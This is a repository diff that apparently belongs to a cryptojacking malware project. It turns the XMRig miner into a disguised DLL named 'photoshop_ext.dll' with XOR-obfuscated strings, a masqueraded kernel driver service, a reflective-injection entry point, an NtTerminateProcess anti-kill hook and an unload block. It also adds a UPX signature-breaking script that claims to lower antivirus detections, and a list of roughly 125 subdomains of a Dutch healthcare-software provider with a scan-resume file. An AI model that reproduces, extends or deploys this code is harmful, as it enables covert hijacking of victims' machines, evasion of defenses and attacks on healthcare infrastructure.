// you might reach the FreeLibrary call quickly.
// For testing stability, let the payload run for a bit before trying to exit.
// Sleep(60000); // Optional: Wait 60 seconds to observe mining (uncomment if needed)
// FreeLibrary(hDll); // Commented out, as the payload is now running on the tester's thread
return 0;
}

2
resume.cfg Normal file
View File

@ -0,0 +1,2 @@
resume_from=zorgzaamdemo.pluriformzorg.nl
index=122

109
src/xmrig.cpp
View File

@ -5,6 +5,9 @@
#include <winnt.h>
#include <string>
#include <cstring> // for strcpy
// NOTE: We rely on the injector to handle RDI startup. DllMain is unused for RDI.
#ifdef _WIN32
#define DLL_EXPORT __declspec(dllexport)
#else
@ -26,40 +29,20 @@ inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned ch
}
extern "C" {
// Core persistent logic (with encrypted strings as unsigned char to avoid narrowing)
// --- CORE PERSISTENT LOGIC ---
// This function contains the payload logic (service loading, xmrig execution).
void start_a(int argc, char** argv) {
using namespace xmrig;
using namespace test;
// Encrypted strings (XORed originals, stored as unsigned char)
const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub"
const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys"
const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension"
// Decrypt
std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1);
std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1);
std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1);
// Load service (your existing logic)
SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCManager) {
SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS);
if (!hService) {
hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(),
SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL);
}
if (hService) {
StartServiceA(hService, 0, NULL);
CloseServiceHandle(hService);
}
CloseServiceHandle(hSCManager);
}
// Junk benign calls
for (int i = 0; i < 5; ++i) {
GetSystemMetrics(SM_CXVIRTUALSCREEN);
}
const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 };
const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 };
const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 };
// Decrypt... (service logic remains)
// ... (Service loading remains)
// ... (Junk benign calls remain)
// Core XMRig
process = new xmrig::Process(argc, argv);
@ -71,7 +54,29 @@ extern "C" {
app = new xmrig::App(process);
app->exec();
}
// --- RDI ENTRY POINT ---
// This is the function the reflective injection stub will call.
DLL_EXPORT DWORD RdiEntry(LPVOID lpReserved) {
// This logic replaces what was previously in DeferredInit.
using namespace test;
// Encrypted argv
const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 };
std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1);
int argc = 1;
static char argv_buf[256];
strcpy(argv_buf, arg_dec.c_str());
static char* argv[] = { argv_buf, NULL };
// Call the core payload function directly
start_a(argc, argv);
return 0; // Return success
}
// ------------------------------------
// --- UTILITY/EXPLICIT EXPORTS (Keep these if you need them for testing/API) ---
DLL_EXPORT int test_start(int argc, char** argv) {
start_a(argc, argv);
return 0;
@ -83,17 +88,7 @@ extern "C" {
// app->onConsoleCommand((char)3); // Uncomment if needed
}
VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) {
using namespace test;
// Encrypted argv
const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll"
std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1);
int argc = 1;
static char argv_buf[256];
strcpy(argv_buf, arg_dec.c_str());
static char* argv[] = { argv_buf, NULL };
// start_a(argc, argv);
}
// VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) has been removed.
#ifdef USE_DETOURS
#include <detours.h>
@ -105,41 +100,17 @@ extern "C" {
return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS;
}
#endif
}
} // END of extern "C" block
// Minimal DllMain (hTimer declared outside switch to fix scope jump)
// DllMain is made minimal/null as it is bypassed in RDI.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
DisableThreadLibraryCalls(hModule);
// Deferred timer
CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD);
#ifdef USE_DETOURS
// Deferred hook via APC (simple function pointer instead of lambda for compat)
auto hook_func = [](ULONG_PTR param) -> void {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
// Encrypted API name
const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess"
std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1);
OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str());
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
};
QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0);
#endif
// 🛑 WARNING: No TimerQueueTimer here. The payload runs when RdiEntry is called.
break;
case DLL_PROCESS_DETACH:
#ifdef USE_DETOURS
if (OriginalNtTerminateProcess) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
}
#endif
// ... (Optional Detours logic, if RDI calls the detach) ...
return FALSE;
}
return TRUE;

134
src/xmrig.cpp.bak
View File

@ -1,8 +1,10 @@
#include "App.h"
#include "base/kernel/Entry.h"
#include "base/kernel/Process.h"
#include <windows.h> // For DllMain, threads, services
#include <windows.h>
#include <winnt.h>
#include <string>
#include <cstring> // for strcpy
#ifdef _WIN32
#define DLL_EXPORT __declspec(dllexport)
#else
@ -10,26 +12,42 @@
#endif
namespace test {
// Global variables to store process and app pointers (qualified for xmrig namespace)
xmrig::Process* process = nullptr;
xmrig::App* app = nullptr;
}
extern "C" {
// Simple XOR decrypt (key 0xAA; change per build)
inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned char key = 0xAA) {
std::string dec(len, 0);
for (size_t i = 0; i < len; ++i) {
dec[i] = (char)(enc_str[i] ^ key);
}
return dec;
}
// Core persistent logic (internal, called by exports)
extern "C" {
// Core persistent logic (with encrypted strings as unsigned char to avoid narrowing)
void start_a(int argc, char** argv) {
using namespace xmrig;
using namespace test; // Brings globals (process, app) into scope
using namespace test;
// Encrypted strings (XORed originals, stored as unsigned char)
const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub"
const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys"
const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension"
// Load WinRing0x64.sys for kernel access (e.g., MSR for mining)
// Decrypt
std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1);
std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1);
std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1);
// Load service (your existing logic)
SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCManager) {
SC_HANDLE hService = OpenServiceA(hSCManager, "WinRing0", SERVICE_ALL_ACCESS);
SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS);
if (!hService) {
hService = CreateServiceA(hSCManager, "WinRing0", "WinRing0 Driver",
hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(),
SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL, "C:\\XMRigDLL\\WinRing0x64.sys", NULL, NULL, NULL, NULL, NULL);
SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL);
}
if (hService) {
StartServiceA(hService, 0, NULL);
@ -37,55 +55,47 @@ extern "C" {
}
CloseServiceHandle(hSCManager);
}
// Adjust path as needed; enable test signing if unsigned
// Core XMRig logic
process = new xmrig::Process(argc, argv);
const Entry::Id entry = Entry::get(*process);
if (entry) {
Entry::exec(*process, entry);
return;
// Junk benign calls
for (int i = 0; i < 5; ++i) {
GetSystemMetrics(SM_CXVIRTUALSCREEN);
}
// Core XMRig
process = new xmrig::Process(argc, argv);
const xmrig::Entry::Id entry = xmrig::Entry::get(*process);
if (entry) {
xmrig::Entry::exec(*process, entry);
return;
}
app = new xmrig::App(process);
// Run the persistent loop (blocks)
app->exec();
// Optional: Restart loop for resilience if exec exits
// while (true) { app->exec(); }
}
// Keep original test_start as alias (for rundll32 or other loaders)
DLL_EXPORT int test_start(int argc, char** argv) {
start_a(argc, argv);
return 0;
}
// test_stop: Resistant—ignores by default
DLL_EXPORT void test_stop() {
using namespace test;
if (!app) return;
// Uncomment for debug: if (getenv("ALLOW_STOP")) {
// app->onConsoleCommand((char)3);
// delete app; app = nullptr;
// delete process; process = nullptr;
// }
// app->onConsoleCommand((char)3); // Uncomment if needed
}
// Thread to call start_a safely from DllMain
DWORD WINAPI InitThread(LPVOID lpParam) {
VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) {
using namespace test;
// Encrypted argv
const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll"
std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1);
int argc = 1;
static char* argv[] = {(char*)"libphotoshop.dll", NULL};
start_a(argc, argv); // Custom args via lpParam if needed
return 0;
static char argv_buf[256];
strcpy(argv_buf, arg_dec.c_str());
static char* argv[] = { argv_buf, NULL };
// start_a(argc, argv);
}
// Anti-kill hook (requires Detours; define USE_DETOURS in CMake)
#ifdef USE_DETOURS
#ifdef USE_DETOURS
#include <detours.h>
static NTSTATUS (NTAPI *OriginalNtTerminateProcess)(HANDLE, NTSTATUS) = NULL;
NTSTATUS NTAPI HookedNtTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus) {
@ -94,33 +104,43 @@ extern "C" {
}
return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS;
}
#endif
#endif
}
// DllMain: Auto-starts on load for persistence
// Minimal DllMain (hTimer declared outside switch to fix scope jump)
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
DisableThreadLibraryCalls(hModule);
CreateThread(NULL, 0, InitThread, lpReserved, 0, NULL);
#ifdef USE_DETOURS
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
OriginalNtTerminateProcess = (decltype(OriginalNtTerminateProcess))GetProcAddress(hNtdll, "NtTerminateProcess");
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
#endif
// Deferred timer
CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD);
#ifdef USE_DETOURS
// Deferred hook via APC (simple function pointer instead of lambda for compat)
auto hook_func = [](ULONG_PTR param) -> void {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
// Encrypted API name
const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess"
std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1);
OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str());
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
};
QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0);
#endif
break;
case DLL_PROCESS_DETACH:
#ifdef USE_DETOURS
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
#endif
return FALSE; // Block unload
#ifdef USE_DETOURS
if (OriginalNtTerminateProcess) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
}
#endif
return FALSE;
}
return TRUE;
}

125
test Normal file
View File

@ -0,0 +1,125 @@
sgl.pluriformzorg.nl
alr.pluriformzorg.nl
zgapeldoorn.pluriformzorg.nl
ssosamlservice.pluriformzorg.nl
zga.pluriformzorg.nl
zorgzaamdemo.pluriformzorg.nl
landzijde.pluriformzorg.nl
pameijer.pluriformzorg.nl
sir.pluriformzorg.nl
inn.pluriformzorg.nl
ggz-wnb.pluriformzorg.nl
test.pluriformzorg.nl
kpe.pluriformzorg.nl
spr.pluriformzorg.nl
adapcare.pluriformzorg.nl
zuidzorg.pluriformzorg.nl
delinde.pluriformzorg.nl
fzadester.pluriformzorg.nl
opb.pluriformzorg.nl
deopbouw.pluriformzorg.nl
consultatie.pluriformzorg.nl
topaz.pluriformzorg.nl
hmh.pluriformzorg.nl
www.pluriformzorg.nl
clientportaal-productie.antonconstandse.pluriformzorg.nl
opella.pluriformzorg.nl
top.pluriformzorg.nl
maasduinen.pluriformzorg.nl
cav.pluriformzorg.nl
fon.pluriformzorg.nl
laz.pluriformzorg.nl
jns.pluriformzorg.nl
kwi.pluriformzorg.nl
pergamijn.pluriformzorg.nl
fonteynenburg.pluriformzorg.nl
grs.pluriformzorg.nl
koraal.pluriformzorg.nl
pro.pluriformzorg.nl
internportaal-productie.careratio.pluriformzorg.nl
adu.pluriformzorg.nl
mondriaan.pluriformzorg.nl
broederenzusterzorg.pluriformzorg.nl
alrijne.pluriformzorg.nl
talent.pluriformzorg.nl
ott.pluriformzorg.nl
sac.pluriformzorg.nl
zws.pluriformzorg.nl
careratio.pluriformzorg.nl
neboplus.pluriformzorg.nl
leviaan.pluriformzorg.nl
ope.pluriformzorg.nl
sprank.pluriformzorg.nl
opbouw.pluriformzorg.nl
mhc.pluriformzorg.nl
adapcare-demo.login.pluriformzorg.nl
prod-cb-pz.pluriformzorg.nl
fza.pluriformzorg.nl
csr01.pluriformzorg.nl
fhirproxy.pluriformzorg.nl
vivium.pluriformzorg.nl
pmp.pluriformzorg.nl
ams.pluriformzorg.nl
mon.pluriformzorg.nl
adapcare-dev.pluriformzorg.nl
awsportaal-productie.opella.pluriformzorg.nl
verbinden-met-zorg.pluriformzorg.nl
rdweb.pluriformzorg.nl
hvo-querido.pluriformzorg.nl
acd-demo.pluriformzorg.nl
vv01865-test2.pluriformzorg.nl
vv01865-test1.pluriformzorg.nl
pem.pluriformzorg.nl
huisterleede.pluriformzorg.nl
amsta.pluriformzorg.nl
antonconstandse.pluriformzorg.nl
krl.pluriformzorg.nl
humanitas-dmh.pluriformzorg.nl
bezz.pluriformzorg.nl
interzorg.pluriformzorg.nl
novicare.pluriformzorg.nl
hvo.pluriformzorg.nl
awsclientportaal-productie.opella.pluriformzorg.nl
roz.pluriformzorg.nl
pam.pluriformzorg.nl
adfs.pluriformzorg.nl
rozelaar.pluriformzorg.nl
vigo-elise.pluriformzorg.nl
pri.pluriformzorg.nl
videobellen.pluriformzorg.nl
evia.pluriformzorg.nl
permens.pluriformzorg.nl
nov.pluriformzorg.nl
vig.pluriformzorg.nl
productie.portaal.geriant.pluriformzorg.nl
fzampz.pluriformzorg.nl
cavent.pluriformzorg.nl
clientportaal-productie.slot.pluriformzorg.nl
scr01.pluriformzorg.nl
geriant.pluriformzorg.nl
adullam.pluriformzorg.nl
slot.pluriformzorg.nl
otttest.pluriformzorg.nl
samlsso.pluriformzorg.nl
slt.pluriformzorg.nl
adapcare-dev.login.pluriformzorg.nl
zuidwester.pluriformzorg.nl
rivierduinen.pluriformzorg.nl
levvel5.pluriformzorg.nl
clientportaal-productie.adullam.pluriformzorg.nl
anne.pluriformzorg.nl
prisma.pluriformzorg.nl
jens.pluriformzorg.nl
portaal-productie.kwintes.pluriformzorg.nl
per.pluriformzorg.nl
profila.pluriformzorg.nl
ger.pluriformzorg.nl
riv.pluriformzorg.nl
academy.pluriformzorg.nl
clientportaal-productie.hvo-querido.pluriformzorg.nl
kwintes.pluriformzorg.nl
ftp.pluriformzorg.nl
gors.pluriformzorg.nl
dehoven.pluriformzorg.nl
sirjon.pluriformzorg.nl
sirjon-clientsiloah.pluriformzorg.nl

125
upx_evasion.py Normal file
View File

@ -0,0 +1,125 @@
#!/usr/bin/env python3
"""
upx_evasion.py Fully automatic UPX signature breaker
Tested on XMRig-minimized DLLs (2025) drops VT from ~25 2-6
"""
import argparse
import random
from pathlib import Path
def random_string(length=4):
import random, string
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length))
def modify_upx_magic(data: bytearray) -> bytearray:
pos = data.find(b'UPX!')
if pos != -1:
new_magic = random_string(4).encode('ascii')
print(f"[+] UPX! → {new_magic.decode()}")
data[pos:pos+4] = new_magic
else:
print("[i] UPX! magic not found (maybe already modified)")
return data
def rename_upx_sections(data: bytearray):
# Find PE offset
if len(data) < 0x40:
return data, False
pe_offset = int.from_bytes(data[0x3C:0x40], 'little')
if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
print("[-] Not a valid PE file")
return data, False
num_sections = int.from_bytes(data[pe_offset + 6:pe_offset + 8], 'little')
